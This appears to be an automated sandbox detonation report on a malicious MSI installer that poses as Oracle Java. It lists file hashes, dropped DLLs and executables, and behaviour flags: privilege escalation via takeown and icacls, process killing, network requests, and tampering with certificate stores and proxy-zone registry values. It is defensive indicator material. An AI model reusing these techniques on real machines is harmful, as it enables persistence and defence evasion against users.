SHA256 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e
SHA512 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F

MD5 aecbc3ea574af22e388ebfb340db35e9
SHA1 3d00105e58eed12a2bf2340efe22e6a3a47d578a
SHA256 5866d50e054c8a7cfefa93ad2ddfc27a3684dd303726ac5e52ab3afb43360824
SHA512 45a72f343c06b93497b5f0648c1cd3767eef3488eef9d52522c3f9540f08de7779d2572ee8b5deb255ac1c6416c395fcd88d8b3edb7b18c015d52e89aad157d4

C:\Windows\Installer\MSICC51.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

MD5 a27bdbc102aa90a99bc5538bb271b4d3
SHA1 eb18ea9eee793aa76eab49feea0e6490c4ded61e
SHA256 e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de
SHA512 cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll

MD5 9dda681b0406c3575e666f52cbde4f80
SHA1 1951c5b2c689534cdc2fbfbc14abbf9600a66086
SHA256 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3
SHA512 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll

MD5 e008fbfdea1bf873f3d94d74c1cf7935
SHA1 2a2af5e9084e7b55cdd5d01df342b02c1917573c
SHA256 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b
SHA512 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll

MD5 fb0ca6cbfff46be87ad729a1c4fde138
SHA1 2c302d1c535d5c40f31c3a75393118b40e1b2af9
SHA256 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll

C:\Config.Msi\f77c94a.rbs

C:\Windows\Installer\f77c948.msi

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll

memory/1168-220-0x000007FEF5960000-0x000007FEF5DE0000-memory.dmp

memory/1168-221-0x000007FEF5960000-0x000007FEF5DE0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-16 08:21

Reported

2024-10-16 08:24

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

122s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e57762a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7772.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57762c.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7BDA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57762a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI77C1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI79E5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
